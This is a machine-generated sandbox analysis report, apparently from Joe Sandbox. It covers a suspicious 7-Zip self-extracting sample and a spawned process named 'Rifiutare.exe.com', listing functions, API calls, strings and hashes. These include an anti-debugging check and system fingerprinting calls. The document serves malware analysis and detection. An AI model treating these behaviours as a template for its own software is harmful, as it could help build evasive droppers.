API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 3aa07e0a7f1af689ece96d308e0d97d5d4d1cf2e54ab12650ba7b2974e37ea09
Instruction ID: 552ae8ed6ee0fcd442ad2df4779f82c6782e58800ccef47fbdddea08636dacf5
Opcode Fuzzy Hash: 3aa07e0a7f1af689ece96d308e0d97d5d4d1cf2e54ab12650ba7b2974e37ea09
Instruction Fuzzy Hash: 471163B5A00209AFEB10DF54DC88FEAB7B8EB08304F04806AED15A7291DB74ED44CF55

Function 0040C0C0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0040C1F6,?,?,?,?,00000000,0040C27F,?,?,?,?,0040C2BF), ref: 0040C0DC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0040C1F6,?,?,?,?,00000000,0040C27F,?,?,?,?,0040C2BF), ref: 0040C0E2
??2@YAPAXI@Z.MSVCRT(00000040,00000000,00000000,0040C1F6,?,?,?,?,00000000,0040C27F,?,?,?,?,0040C2BF), ref: 0040C0EF
memmove.MSVCRT(-00000004,00000000,00000000), ref: 0040C125

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@memmove
String ID:
API String ID: 1826340609-0
Opcode ID: 7d6504357a63624ebbf63e7d2564780171e3895f61a9aa19c6a6dbcff992711a
Instruction ID: d72a3ecf45b14767aacc25f0edad6bbd2b7de6c552061b2cfde35ae26a62c5f5
Opcode Fuzzy Hash: 7d6504357a63624ebbf63e7d2564780171e3895f61a9aa19c6a6dbcff992711a
Instruction Fuzzy Hash: 67019E76600601ABD210AB59D8859A773F6EBC4314708893EE85BD7741DB38E892CB68

Function 0040455D Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,?), ref: 00404585
??3@YAXPAX@Z.MSVCRT(?), ref: 0040458E
ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 004045A6
??3@YAXPAX@Z.MSVCRT(?,?), ref: 004045BE

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@wcsncpy
String ID:
API String ID: 3034541985-0
Opcode ID: e0fe7b5910432ef50a0a8318928bacb5c4c5a05a3a776a5bbc470781a438ae21
Instruction ID: 2e5778dcc9210aa7dd5b0ff30e3ff33adc1733fc5fdfc97d9385700bbc9d95d0
Opcode Fuzzy Hash: e0fe7b5910432ef50a0a8318928bacb5c4c5a05a3a776a5bbc470781a438ae21
Instruction Fuzzy Hash: E6F086B29001047ED714B755EC52DEE737CDF80704B10027EFA12B2195EF756E45C668

Function 00408DCA Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00408E04
GetClientRect.USER32(?,?), ref: 00408E16
PtInRect.USER32(?,?,?), ref: 00408E25

Part of subcall function 00408557: KillTimer.USER32(?,00000001,?,00408E3A), ref: 00408565

CallNextHookEx.USER32(?,?,?), ref: 00408E47

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 5d011e402e72c6a9b9df993ad098a0545963fe571f3a7749bf0a2aad1169c23d
Instruction ID: 8fcd255104d3cefc2dd881faf99252f3ba0547ec7e41450095debebf42560e69
Opcode Fuzzy Hash: 5d011e402e72c6a9b9df993ad098a0545963fe571f3a7749bf0a2aad1169c23d
Instruction Fuzzy Hash: 80015B35100115EBDB11AF55DE09EAA7BA6FB04304B08843AE956E32A1EB34E851DB99

Function 004118AA Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,?,004119DE,?,00411CC1,00000000,?,?,00000000,004050A9,?,0041ADC8,?), ref: 004118D4
memcpy.MSVCRT(00000000,?,?,00000000,00000000,?,00000000,?,004119DE,?,00411CC1,00000000,?,?,00000000,004050A9), ref: 004118E6
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,00000000,?,00000000,?,004119DE,?,00411CC1,00000000,?,?,00000000), ref: 004118ED
_CxxThrowException.MSVCRT(00000000,0041C9D4), ref: 00411911

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 59522b9d663a006d42a11aac5f69606e4972673f07fc2ef7bcdb3eae39c19829
Instruction ID: 5ee8940816b856f5d356b0442bc385a37373ddd71d54f703b79fddb5c0f671e4
Opcode Fuzzy Hash: 59522b9d663a006d42a11aac5f69606e4972673f07fc2ef7bcdb3eae39c19829
Instruction Fuzzy Hash: 37F0A4B22002097FD7249F29C886D9AF7EDEF44358B15853FF55A87111D635E9808768

Function 00413ECE Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(-00000010,00000000,?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413EF4
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413F03
??3@YAXPAX@Z.MSVCRT(?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413F12
??3@YAXPAX@Z.MSVCRT(?,?,?,00416AB5,00000003,?,00000000,00000000,00416B12,00000000), ref: 00413F1E

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 6ecebc8fe35b15f2f4658fd50fc4d58a1ee2178658a9431f9aca16722c220241
Instruction ID: df1d0de5d1faf2a4a63eb667afbff75c77527abce675b50cc2a020710efc852e
Opcode Fuzzy Hash: 6ecebc8fe35b15f2f4658fd50fc4d58a1ee2178658a9431f9aca16722c220241
Instruction Fuzzy Hash: 7CF084323042022AD2111F0DDC0A7CABBFA9F41362F08001FFA41A2362CA1ADEC2C18C

Function 00404C1B Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00404BDD: GetWindowTextLengthW.USER32(?), ref: 00404BEA
Part of subcall function 00404BDD: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404C04

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

??3@YAXPAX@Z.MSVCRT(?,?,?,0041AD70,0041AD78,0041E7F0,?,?,?,?,?,?,?,?,00407A26), ref: 00404C63
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041AD70,0041AD78,0041E7F0,?,?,?,?,?,?,?,?,00407A26), ref: 00404C6B
SetWindowTextW.USER32(?,?), ref: 00404C76
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00407A26), ref: 00404C81

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@TextWindow$Lengthmemcpy
String ID:
API String ID: 396479319-0
Opcode ID: 0445f756f2a7ca887c11b9469608701bcee61c3d7040cf18a8db65bd5d881795
Instruction ID: 647b8b2bf9eadde8599631ea9265a657a51aafb4ceea6ad50fefe68966c78ca3
Opcode Fuzzy Hash: 0445f756f2a7ca887c11b9469608701bcee61c3d7040cf18a8db65bd5d881795
Instruction Fuzzy Hash: 63F04432D044096ACB05F7D1EC578DDB779DE08318B1001ABF602B21A1EF796ED5C69C

Function 00411604 Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,00920F20,00000000,?,00411709,?,00411862,00000000,?,00920F20,0041AD18,0040412A,0041AD18,?,-00000001), ref: 00411620
memcpy.MSVCRT(00000000,00920F20,?,?,?,00920F20,00000000,?,00411709,?,00411862,00000000,?,00920F20,0041AD18,0040412A), ref: 0041162F
??3@YAXPAX@Z.MSVCRT(00920F20,00000000,00920F20,?,?,?,00920F20,00000000,?,00411709,?,00411862,00000000,?,00920F20,0041AD18), ref: 00411636
_CxxThrowException.MSVCRT(00920F20,0041C9D4), ref: 0041165A

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: b7077fc6d72f980726724f3404c27e9269fca811e94df1e07385922be1dcacac
Instruction ID: acb851cd5d6ec94b4642c442a788d7ea64d5cf8d2888cb5aee67fa9e3068b209
Opcode Fuzzy Hash: b7077fc6d72f980726724f3404c27e9269fca811e94df1e07385922be1dcacac
Instruction Fuzzy Hash: D4F0B4B2100209BFD720AF5ACC81DDAF7EEFF54358714442FF99A83511D235A8C08BA8

Function 00408287 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 004082A2
CreateFontIndirectW.GDI32(?), ref: 004082B8
GetDlgItem.USER32(?,000004B5), ref: 004082CC
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004082D8

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 5b90f754ead787c82706a5892f36a112a510cb736c9de123742b44b620c41e27
Instruction ID: a857720c60cc7c4988bb0c271694e7fb1085ae67bc77bdb5017f4508090161c8
Opcode Fuzzy Hash: 5b90f754ead787c82706a5892f36a112a510cb736c9de123742b44b620c41e27
Instruction Fuzzy Hash: BAF0BE75501708ABD7205BA4DE09FCB7FACAB48B00F048039AE42E21D4DBB4D8108B29

Function 004039BC Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004039C4
GetWindowRect.USER32(?,?), ref: 004039D2
ScreenToClient.USER32(00000000,?), ref: 004039E0
ScreenToClient.USER32(00000000,?), ref: 004039E7

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 2d4f567ce59a15c9bff0a5a7b1bdb7657322f25b8406bf3dc624692a176b5e82
Instruction ID: 05e44d1457520c43b4422ecb6510286d39cbf22b8ad041ba1dad1a8fa24c712d
Opcode Fuzzy Hash: 2d4f567ce59a15c9bff0a5a7b1bdb7657322f25b8406bf3dc624692a176b5e82
Instruction Fuzzy Hash: 06E0C2732022206B931127B66C88CEB5E5CCDC25723060036F909D2311C9B5CC0185B0

Function 00405A8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

??3@YAXPAX@Z.MSVCRT(?,PreExtract,0041AA3C,00000000,?,00000000,PreExtract,0041E89C,00000000), ref: 00405B55

Strings

Shortcut, xrefs: 00405AD5
PreExtract, xrefs: 00405A96

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@??3@
String ID: PreExtract$Shortcut
API String ID: 1936579350-2482910946
Opcode ID: fadad1ec2e81b89812f4e292f7c130b7338f4d0e1c19578ce685f96c8dd63308
Instruction ID: 315cf4f10766d584262b92d033bb85e5ff693b0b03308dd198ea8ef753a083d6
Opcode Fuzzy Hash: fadad1ec2e81b89812f4e292f7c130b7338f4d0e1c19578ce685f96c8dd63308
Instruction Fuzzy Hash: 6B21A634A005099ADF24EB55C5856FFB374DF51324F24423BE861BA2C1EA7CAE81CF69

Function 004056CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00405668

Strings

tA, xrefs: 004056DF
MiscFlags, xrefs: 0040564A

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: _wtol
String ID: MiscFlags$tA
API String ID: 2131799477-2718850419
Opcode ID: 2afad0e8fec61067b3716dfa9b106afa26c29772baddf64e22fdb0a12229e978
Instruction ID: c8600267b0de4b6b736e5ffddf797ee874a7f0c572f21ec5a04ec4b3cd89c438
Opcode Fuzzy Hash: 2afad0e8fec61067b3716dfa9b106afa26c29772baddf64e22fdb0a12229e978
Instruction Fuzzy Hash: 30F0306180082042DB38161554C857BA696DA1B761FB94E3BE85EF12E0D33F8CC19D6F

Function 00405B77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00405B85

Strings

Could not allocate memory, xrefs: 00405B7E
7-Zip SFX, xrefs: 00405B79

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: c7186cdcb0c566b5a5a438bceff3b0e8cdd749d374d7577f2b3fc30ec3787668
Instruction ID: 2fd3f133cd00b8be6539cc3c82b36fa91af98800b418d3be2fc451a6c5964550
Opcode Fuzzy Hash: c7186cdcb0c566b5a5a438bceff3b0e8cdd749d374d7577f2b3fc30ec3787668
Instruction Fuzzy Hash: BEB012303C930821D10003200C0BFD41160D70CF16F5044517100A8CC9C7C87090914D

Analysis Process: Rifiutare.exe.comPID: 5700, Parent PID: 3428COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	1947
Total number of Limit Nodes:	50

Executed Functions

Function 00C329A4 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00C329D3

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

GetCurrentProcess.KERNEL32(?,00CCD958,00000000,?,?), ref: 00C32AEA
IsWow64Process.KERNEL32(00000000,?,?), ref: 00C32AF1
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C32B1C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C32B2E
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C32B3C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00C32B43
GetSystemInfo.KERNEL32(?,?,?), ref: 00C32B68

Strings

GetNativeSystemInfo, xrefs: 00C32B28
kernel32.dll, xrefs: 00C32B17

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3290436268-192647395
Opcode ID: 21e6a9627fd4aa9bad3c2c99f5ee8c0a2c76947ae18d035123b526c94137bb49
Instruction ID: f710b0ab76bad5811b35854f509d786c1b054c8cb0371b256b63e8fab07ee474
Opcode Fuzzy Hash: 21e6a9627fd4aa9bad3c2c99f5ee8c0a2c76947ae18d035123b526c94137bb49
Instruction Fuzzy Hash: 68918F7291F3C0CFCB16DB697C497BA7F64AB66300B1888ADE18DD3365D6284605DB32

Function 00C3331E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C3292D,?), ref: 00C3334E
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C3292D,?), ref: 00C33361
